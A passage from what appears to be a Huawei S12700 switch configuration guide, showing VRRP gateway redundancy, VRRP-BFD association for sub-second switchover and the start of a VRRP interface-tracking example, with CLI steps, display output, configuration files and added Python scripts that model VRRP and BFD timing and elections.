[Switch-GigabitEthernet1/0/2] quit

# Configure OSPF on SwitchA, SwitchB, and SwitchC. SwitchA is used as an example. The
configurations of SwitchB and SwitchC are similar to the configuration of SwitchA, and are
not mentioned here. For details, see the configuration files.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.10.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.50.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

Step 2 Configure a VRRP group.

# Configure VRRP group 1 on SwitchA and SwitchB, set the priority of SwitchA to 120 and
the preemption delay to 20s, and set the default priority for SwitchB.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] vrrp vrid 1 virtual-ip 10.1.10.111
[SwitchA-Vlanif100] vrrp vrid 1 priority 120 //The default priority of a device in a VRRP
group is 100. Set the priority of the master higher than that of the backup.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP group
preempts immediately by default. Set a preemption delay on the master so that a flapping
link does not cause repeated master/backup switchovers and service interruptions.
[SwitchA-Vlanif100] quit
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 1 virtual-ip 10.1.10.111
[SwitchB-Vlanif100] quit

# Configure VRRP group 2 on SwitchA and SwitchB, set the priority of SwitchB to 120 and
the preemption delay to 20s, and set the default priority for SwitchA.
[SwitchB] interface vlanif 500
[SwitchB-Vlanif500] vrrp vrid 2 virtual-ip 10.1.50.111
[SwitchB-Vlanif500] vrrp vrid 2 priority 120 //The default priority of a device in a VRRP
group is 100. Set the priority of the master higher than that of the backup.
[SwitchB-Vlanif500] vrrp vrid 2 preempt-mode timer delay 20 //A device in a VRRP group
preempts immediately by default. Set a preemption delay on the master so that a flapping
link does not cause repeated master/backup switchovers and service interruptions.
[SwitchB-Vlanif500] quit
[SwitchA] interface vlanif 500
[SwitchA-Vlanif500] vrrp vrid 2 virtual-ip 10.1.50.111
[SwitchA-Vlanif500] quit

Step 3 Verify the configuration.

# After the configuration is complete, run the display vrrp command on SwitchA. You can
see that SwitchA is the master in VRRP group 1 and the backup in VRRP group 2.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.10.111
Master IP : 10.1.10.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

Vlanif500 | Virtual Router 2
State : Backup
Virtual IP : 10.1.50.111
Master IP : 10.1.50.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# After the configuration is complete, run the display vrrp command on SwitchB. You can
see that SwitchB is the backup in VRRP group 1 and the master in VRRP group 2.
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.10.111
Master IP : 10.1.10.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

Vlanif500 | Virtual Router 2
State : Master
Virtual IP : 10.1.50.111
Master IP : 10.1.50.2
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 300 500
#
interface Vlanif100
ip address 10.1.10.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.10.111
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
#
interface Vlanif300
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif500
ip address 10.1.50.1 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.50.111
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 300
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 500
#
ospf 1
area 0.0.0.0
network 10.1.10.0 0.0.0.255
network 10.1.50.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 100 200 500
#
interface Vlanif100
ip address 10.1.10.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.10.111
#
interface Vlanif500
ip address 10.1.50.2 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.50.111
vrrp vrid 2 priority 120
vrrp vrid 2 preempt-mode timer delay 20
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 500
#
ospf 1
area 0.0.0.0
network 10.1.10.0 0.0.0.255
network 10.1.50.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 200 300 400
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif400
ip address 172.16.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 300
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 400
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of the switch
#
sysname Switch
#
vlan batch 100 500
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100 500
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 500
#
return

11.1.3 Example for Configuring Association Between VRRP and BFD to Implement a Rapid Active/Standby Switchover

Overview of Association Between VRRP and BFD
A VRRP group elects the master and backup by exchanging VRRP Advertisement packets. If the
link carrying these packets fails, the packets stop arriving, and the backup learns of the
fault only when its master-down timer expires, that is, after three advertisement intervals
plus a skew time derived from its priority. During that period hosts keep sending traffic to
the original master, and the traffic is lost.
BFD can rapidly detect connectivity faults on links and routes. Association between VRRP
and BFD brings the active/standby switchover to within 1 second: a BFD session is set up
between the master and backup and bound to the VRRP group, BFD monitors the link the VRRP
group depends on, and when it detects a fault it notifies the VRRP group to perform the
switchover immediately rather than waiting for the VRRP timers, greatly reducing the service
interruption time.

Configuration Notes
l Ensure that each device of the same VRRP group is configured with the same VRID.
l Multiple VRRP groups can monitor a BFD session, and a VRRP group can monitor a
maximum of eight BFD sessions simultaneously.
l The following describes the applicable product models and versions.

Table 11-3 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 11-3, hosts on a LAN are dual-homed to SwitchA and SwitchB through
the switch. A VRRP group is established on SwitchA and SwitchB, and SwitchA is the
master.
If SwitchA or the link between SwitchA and SwitchB fails, SwitchB takes over only after VRRP
itself times out, that is, after it has missed three consecutive advertisements. To speed up
the switchover, deploy a BFD session on the link and associate the VRRP group with it. When
the interface on the master or the link fails, the BFD session detects the fault within
milliseconds and notifies the VRRP group. After receiving the notification, the VRRP group
performs a rapid active/standby switchover: the backup becomes the master and takes over
traffic. This reduces the impact of the fault on service transmission.

NOTE
In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 11-3 Association between VRRP and BFD to implement a rapid active/standby
switchover

(Diagram not reproduced; the addressing it shows is as follows.)
VRRP VRID 1, virtual IP address 10.1.1.3/24.
SwitchA: GE1/0/1, VLANIF 100, 10.1.1.1/24, Master.
SwitchB: GE1/0/1, VLANIF 100, 10.1.1.2/24, Backup.
HostA and HostB connect to the switch, which connects to SwitchA over GE1/0/1 and to SwitchB over GE1/0/2; SwitchA and SwitchB connect to the Internet.
BFD packets are exchanged between SwitchA and SwitchB across the switch.

Configuration Roadmap
Association between VRRP and BFD is used to implement a rapid active/standby switchover.
The configuration roadmap is as follows:
1. Assign an IP address to each interface and configure a routing protocol to ensure
network connectivity.
2. Configure a VRRP group on SwitchA and SwitchB. SwitchA functions as the master, its
priority is 120, and the preemption delay is 20s. SwitchB functions as the backup and
uses the default priority.
3. Configure a static BFD session on SwitchA and SwitchB to monitor the link of the
VRRP group.
4. Configure association between VRRP and BFD on SwitchB so that an active/standby
switchover is performed rapidly when the link fails.

Procedure
Step 1 Configure devices to ensure network connectivity.
# Assign an IP address to each interface. SwitchA is used as an example. The configuration of
SwitchB is similar to that of SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 100
[SwitchA-vlan100] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit

# Configure Layer 2 forwarding on the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid
[Switch-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type hybrid
[Switch-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/2] quit

# Configure OSPF between SwitchA and SwitchB. SwitchA is used as an example. The
configuration of SwitchB is similar to that of SwitchA.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

Step 2 Configure a VRRP group.

# Configure VRRP group 1 on SwitchA, and set the priority of SwitchA to 120 and the
preemption delay to 20s.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.3
[SwitchA-Vlanif100] vrrp vrid 1 priority 120 //The default priority of a device in a VRRP
group is 100. Set the priority of the master higher than that of the backup.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP group
preempts immediately by default. Set a preemption delay on the master so that a flapping
link does not cause repeated master/backup switchovers and service interruptions.
[SwitchA-Vlanif100] quit

# Configure VRRP group 1 on SwitchB. SwitchB keeps the default priority of 100.
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.3
[SwitchB-Vlanif100] quit

Step 3 Configure a static BFD session.

# Create a BFD session on SwitchA.
[SwitchA] bfd
[SwitchA-bfd] quit
[SwitchA] bfd atob bind peer-ip 10.1.1.2 interface vlanif 100 //Configure a
static BFD session to monitor the link of the VRRP group.
[SwitchA-bfd-session-atob] discriminator local 1
[SwitchA-bfd-session-atob] discriminator remote 2
[SwitchA-bfd-session-atob] min-rx-interval 100
[SwitchA-bfd-session-atob] min-tx-interval 100
[SwitchA-bfd-session-atob] commit
[SwitchA-bfd-session-atob] quit

# Create a BFD session on SwitchB.
[SwitchB] bfd
[SwitchB-bfd] quit
[SwitchB] bfd btoa bind peer-ip 10.1.1.1 interface vlanif 100 //Configure a
static BFD session to monitor the link of the VRRP group.
[SwitchB-bfd-session-btoa] discriminator local 2
[SwitchB-bfd-session-btoa] discriminator remote 1
[SwitchB-bfd-session-btoa] min-rx-interval 100
[SwitchB-bfd-session-btoa] min-tx-interval 100
[SwitchB-bfd-session-btoa] commit
[SwitchB-bfd-session-btoa] quit

Run the display bfd session command on SwitchA and SwitchB. You can see that the BFD
session is Up. The display on SwitchA is used as an example.
[SwitchA] display bfd session all
--------------------------------------------------------------------------------
Local Remote PeerIpAddr State Type InterfaceName
--------------------------------------------------------------------------------
1 2 10.1.1.2 Up S_IP_IF Vlanif100
--------------------------------------------------------------------------------
Total UP/DOWN Session Number : 1/0

Step 4 Configure association between VRRP and BFD.

# Configure association between VRRP and BFD on SwitchB. When the BFD session goes Down,
the priority of SwitchB increases by 40, from 100 to 140. Because 140 is higher than the
priority of SwitchA (120) and SwitchB has no preemption delay, SwitchB takes over as the
master immediately instead of waiting for its master-down timer to expire.
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 1 track bfd-session 2 increased 40
[SwitchB-Vlanif100] quit

Step 5 Verify the configuration.

# After the configuration is complete, run the display vrrp command on SwitchA and
SwitchB. SwitchA is the master, SwitchB is the backup, and the associated BFD session is in
Up state.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.3
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.3
Master IP : 10.1.1.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track BFD : 2 Priority increased : 40
BFD-session state : UP
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# Run the shutdown command on GE1/0/1 of SwitchA to simulate a link fault. Then run the
display vrrp command on SwitchA and SwitchB. You can see that SwitchA is in Initialize
state, SwitchB becomes the Master, and the associated BFD session becomes Down.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] shutdown
[SwitchA-GigabitEthernet1/0/1] quit

[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Initialize
Virtual IP : 10.1.1.3
Master IP : 0.0.0.0
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 0
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.3
Master IP : 10.1.1.2
PriorityRun : 140
PriorityConfig : 100
MasterPriority : 140
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track BFD : 2 Priority increased : 40
BFD-session state : DOWN
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# Run the undo shutdown command on GE1/0/1 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] undo shutdown
[SwitchA-GigabitEthernet1/0/1] quit

# After the 20 s preemption delay elapses, run the display vrrp command on SwitchA and
SwitchB. You can see that SwitchA is the master again, SwitchB has returned to the backup
state with its running priority back at 100, and the associated BFD session is Up.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.3
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.3
Master IP : 10.1.1.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track BFD : 2 Priority increased : 40
BFD-session state : UP
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

----End
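The overview above says the backup needs three advertisement intervals before it declares the master down, and Step 4 raises the priority of SwitchB by 40 when the BFD session goes Down. The following Python script, an added example rather than Huawei code or part of the original document, puts numbers on both: it computes the VRRPv2 master-down interval (RFC 3768, including the priority-derived skew time) and the BFD detection time (RFC 5880) for the timers used in this section, checks that the configured increase actually lifts SwitchB above SwitchA so that the rapid path can work, and applies the RFC 3768 election rule to the two switches before and after the BFD event. The BFD detect multiplier of 3 and the cap of the raised priority at 254 are assumptions, since the page states neither; the function names are mine.

```python
import ipaddress

# Added example, not part of the Huawei document. Numbers are the ones used in
# this section: advertisement interval 1 s, SwitchA priority 120, SwitchB 100,
# BFD min-tx/min-rx 100 ms, tracking increase 40.
VRRP_MASTER_DOWN_MULTIPLIER = 3   # RFC 3768: Master_Down_Interval = 3 * Adver_Int + Skew_Time
BFD_DETECT_MULTIPLIER = 3         # assumption: the page leaves the multiplier at its usual default of 3
OWNER_PRIORITY = 255              # reserved for the IP address owner (RFC 3768)


def skew_time(priority):
    """RFC 3768 section 6.1: Skew_Time = (256 - Priority) / 256 seconds."""
    return (256 - priority) / 256


def vrrp_master_down_interval(adver_int, backup_priority):
    """Seconds a backup waits without advertisements before declaring the master down."""
    return VRRP_MASTER_DOWN_MULTIPLIER * adver_int + skew_time(backup_priority)


def bfd_detection_time_ms(local_min_rx_ms, remote_min_tx_ms, multiplier=BFD_DETECT_MULTIPLIER):
    """RFC 5880 section 6.8.4: detection time = multiplier * negotiated remote transmit interval,
    where that interval is the larger of our RequiredMinRx and the peer's DesiredMinTx."""
    return multiplier * max(local_min_rx_ms, remote_min_tx_ms)


def tracked_priority(configured, increase):
    """Running priority after the tracked BFD session goes Down.

    Capped at 254 here as an assumption: 255 is reserved for the IP address owner,
    and the page does not say how the switch clamps an overflow."""
    return min(configured + increase, OWNER_PRIORITY - 1)


def backup_wins(backup_configured, increase, master_configured):
    """True if the raised backup priority beats the master's, so the backup preempts."""
    return tracked_priority(backup_configured, increase) > master_configured


def elect_master(candidates):
    """RFC 3768 election: highest priority wins; ties go to the higher primary IP address.

    candidates: iterable of (priority, primary_ip) for devices whose interface is Up;
    a device in Initialize state (interface Down) is simply not a candidate."""
    return max(candidates, key=lambda c: (c[0], ipaddress.IPv4Address(c[1])))[1]


def switchover_budget(adver_int, backup_priority, rx_ms, tx_ms):
    """(plain VRRP seconds, BFD-assisted seconds) needed just to detect the master failure."""
    plain = vrrp_master_down_interval(adver_int, backup_priority)
    assisted = bfd_detection_time_ms(rx_ms, tx_ms) / 1000
    return plain, assisted


if __name__ == "__main__":
    plain, assisted = switchover_budget(1, 100, 100, 100)
    print(f"plain VRRP detects master loss after {plain:.3f} s, BFD after {assisted:.3f} s")
    # Steady state: SwitchA (120) is elected over SwitchB (100).
    print("master:", elect_master([(120, "10.1.1.1"), (100, "10.1.1.2")]))
    # BFD Down on SwitchB: 100 + 40 = 140 > 120, so SwitchB preempts with delay 0.
    print("increase 40 lets SwitchB win:", backup_wins(100, 40, 120))
    print("master after BFD Down:",
          elect_master([(120, "10.1.1.1"), (tracked_priority(100, 40), "10.1.1.2")]))
    # Misconfiguration to avoid: an increase that does not clear the master's priority.
    print("increase 10 lets SwitchB win:", backup_wins(100, 10, 120))
```

With the timers of this section the two detection figures are 3.609 s (plain VRRP, backup priority 100) against 0.3 s (BFD at 100 ms); that gap is what the association closes. The backup_wins check is the one to run whenever the priorities change: had increased been set to 10 instead of 40, SwitchB would reach only 110, still below 120, and the group would fall back to its own timers.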

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
bfd
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.3
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
bfd atob bind peer-ip 10.1.1.2 interface Vlanif100
discriminator local 1
discriminator remote 2
min-tx-interval 100
min-rx-interval 100
commit
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 100
#
bfd
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.3
vrrp vrid 1 track bfd-session 2 increased 40
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
bfd btoa bind peer-ip 10.1.1.1 interface Vlanif100
discriminator local 2
discriminator remote 1
min-tx-interval 100
min-rx-interval 100
commit
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return

l Configuration file of the switch
#
sysname Switch
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
return

11.1.4 Example for Configuring an Eth-Trunk and Association Between VRRP and the Interface Status

Association Between VRRP and the Interface Status

VRRP on its own only detects whether the master itself is still alive. If the link from the master to the external network goes down, the master keeps sending advertisements, VRRP detects no fault, no active/standby switchover takes place, and hosts that use the master as their gateway can no longer reach the remote network. To cover this case, associate the VRRP group with the status of the interfaces the master depends on.
When the master detects that a tracked uplink interface has gone Down, it lowers its priority by the configured amount so that it falls below the priority of the backup and immediately sends a VRRP advertisement. The backup sees that the advertised priority is lower than its own and becomes the master, so traffic continues to be forwarded. The reduction must be large enough to bring the master below the backup; if it is not, the interface failure changes nothing.
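The priority arithmetic behind this switchover is easy to get wrong: a reduced value that still leaves the master above the backup produces no switchover at all. The following Python model is added here as an illustration and is not part of Huawei's documentation or software. It reproduces the election rules described above: the highest running priority wins, the higher primary IP address breaks a tie (the RFC 3768 rule), a tracked object that is Down applies its reduced or increased delta (the preceding example on this page uses track bfd-session ... increased 40 on the backup), the IP address owner keeps a fixed priority of 255 and cannot track anything, and a recovered router reclaims the master role only after its preemption delay. The router names, interface names and the 20-second delay are taken from this example; the helper names are this script's own.

```python
"""VRRP election with interface/BFD tracking, modelled on the rules described above.
Added illustration for this page; not Huawei code."""
from dataclasses import dataclass, field

DEFAULT_PRIORITY = 100   # VRRP default priority
OWNER_PRIORITY = 255     # fixed priority of the router whose real address is the virtual IP


@dataclass
class VrrpRouter:
    name: str
    ip: str                              # primary address on the VRRP interface (tie-breaker)
    priority: int = DEFAULT_PRIORITY     # PriorityConfig
    preempt_delay: int = 0               # seconds ("vrrp vrid ... preempt-mode timer delay")
    # tracked object -> change applied while that object is Down:
    # negative for "track ... reduced N", positive for "track ... increased N"
    tracked: dict = field(default_factory=dict)
    is_owner: bool = False

    def __post_init__(self):
        if self.is_owner and self.tracked:
            raise ValueError(f"{self.name}: tracking cannot be configured on the IP address owner")
        if not 1 <= self.priority <= 254:
            raise ValueError(f"{self.name}: configured priority must be 1..254")

    def running_priority(self, down=frozenset()):
        """PriorityRun: configured priority plus the deltas of tracked objects that are Down.
        `down` holds (router name, tracked object) pairs, since interfaces are local to a router."""
        if self.is_owner:
            return OWNER_PRIORITY
        delta = sum(d for obj, d in self.tracked.items() if (self.name, obj) in down)
        return max(1, min(254, self.priority + delta))


def _ip_key(ip):
    return tuple(int(octet) for octet in ip.split("."))


def elect_master(routers, down=frozenset()):
    """Highest running priority wins; on a tie the higher primary IP address wins (RFC 3768)."""
    return max(routers, key=lambda r: (r.running_priority(down), _ip_key(r.ip)))


def master_after_recovery(routers, current_master, elapsed):
    """Master `elapsed` seconds after every fault has cleared: the preferred router takes
    over only once its preemption delay has expired (immediately when the delay is 0)."""
    preferred = elect_master(routers)
    if preferred is current_master or elapsed >= preferred.preempt_delay:
        return preferred
    return current_master


def ineffective_tracking(routers):
    """Planning check: each tracked object, failing on its own, must move the master role away
    from the steady-state master. Returns the (router, object) pairs whose failure changes nothing."""
    steady = elect_master(routers)
    return [(r.name, obj) for r in routers for obj in r.tracked
            if elect_master(routers, {(r.name, obj)}) is steady]


if __name__ == "__main__":
    # The two core switches of this example: SwitchA at 120 with both links tracked (reduced 100),
    # SwitchB at the default 100.
    switch_a = VrrpRouter("SwitchA", "10.1.1.2", priority=120, preempt_delay=20,
                          tracked={"GE1/0/1": -100, "GE1/0/2": -100})
    switch_b = VrrpRouter("SwitchB", "10.1.1.3")
    group = [switch_a, switch_b]
    fault = {("SwitchA", "GE1/0/1")}
    print("steady-state master:", elect_master(group).name)
    print("GE1/0/1 down on SwitchA -> PriorityRun", switch_a.running_priority(fault),
          "master:", elect_master(group, fault).name)
    print("ineffective tracking:", ineffective_tracking(group))
    # A reduction of 10 would leave SwitchA at 110, still above SwitchB: no switchover.
    weak = [VrrpRouter("SwitchA", "10.1.1.2", priority=120, tracked={"GE1/0/1": -10}), switch_b]
    print("ineffective tracking with 'reduced 10':", ineffective_tracking(weak))
```

Run ineffective_tracking against the planned priorities before committing a design: every entry it returns is a tracked interface whose failure would leave hosts pointed at a gateway with no path.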

Configuration Notes
l Ensure that each device of the same VRRP group is configured with the same VRID.


l A VRRP group can be associated with a maximum of eight interfaces on a device.
l Association between a VRRP group and the interface status cannot be configured on the device that is the IP address owner; its priority is fixed at 255 and cannot be reduced.
l This example configures no VRRP authentication (the display vrrp output below shows Auth type : NONE), so the advertisements are unauthenticated. They are sent only in sub-VLANs 301 to 305, which are carried on the Eth-Trunk between SwitchA and SwitchB but not on the host-facing VLANs 101 to 180, so the hosts never see them.
l The following describes the applicable product models and versions.

Table 11-4 Applicable product models and versions

Product | Product Model | Software Version
S12700 | S12708 and S12712 | V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
S12700 | S12704 | V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 11-4, the user hosts are dual-homed to SwitchA and SwitchB through the
switch. The requirements are as follows:
l The hosts use SwitchA as the default gateway to connect to the Internet. When SwitchA
or the downlink/uplink fails, SwitchB functions as the gateway to implement gateway
backup.
l The bandwidth of the link between SwitchA and SwitchB is increased to implement link
backup and improve link reliability.
l After SwitchA recovers, it becomes the gateway again within 20s.

Figure 11-4 Networking of association between VRRP and the interface status

[Figure not reproduced. Topology: core layer SwitchA (Master) and SwitchB (Backup), aggregation layer Switch, SwitchC toward the Internet.
l SwitchA GE1/0/1 (192.168.1.1/24) connects to SwitchC GE1/0/1 (192.168.1.2/24); SwitchB GE1/0/1 (192.168.2.1/24) connects to SwitchC GE1/0/2 (192.168.2.2/24); SwitchC GE1/0/3 (172.16.1.1/24) connects to the Internet.
l SwitchA GE1/0/2 connects to Switch GE1/0/1 and SwitchB GE1/0/2 connects to Switch GE1/0/2; the user hosts sit in VLANs 101 to 180 behind the Switch.
l Eth-Trunk1 between SwitchA and SwitchB uses GE1/0/3 and GE1/0/4 on each switch.]

Configuration Roadmap
A VRRP group in active/standby mode is used to implement gateway backup. The
configuration roadmap is as follows:


1. Assign an IP address to each interface and configure a routing protocol to ensure network connectivity.
2. Configure VLAN aggregation (super-VLANs) on SwitchA and SwitchB so that VLANs 101 to 180 stay isolated at Layer 2 while each super-VLAN shares one Layer 3 subnet, which saves IP addresses.
3. Create an Eth-Trunk on SwitchA and SwitchB and add member interfaces to the Eth-Trunk to increase the link bandwidth and implement link backup.
4. Configure a VRRP group between SwitchA and SwitchB. Set a higher priority for SwitchA so that SwitchA functions as the master to forward traffic, and set the preemption delay to 20s on SwitchA. Set a lower priority for SwitchB so that SwitchB functions as the backup.
5. Associate VRRP with GE1/0/1 and GE1/0/2 on SwitchA so that the VRRP group detects an uplink or downlink failure on the master and performs an active/standby switchover immediately.
NOTE

SwitchA and SwitchB are core switches, and the switch is an aggregation switch.

Procedure
Step 1 Configure devices to ensure network connectivity.
# Assign an IP address to each interface on core devices. SwitchA is used as an example. The
configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned
here. For details, see the configuration files.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 11 to 15 101 to 180 301 to 305 400
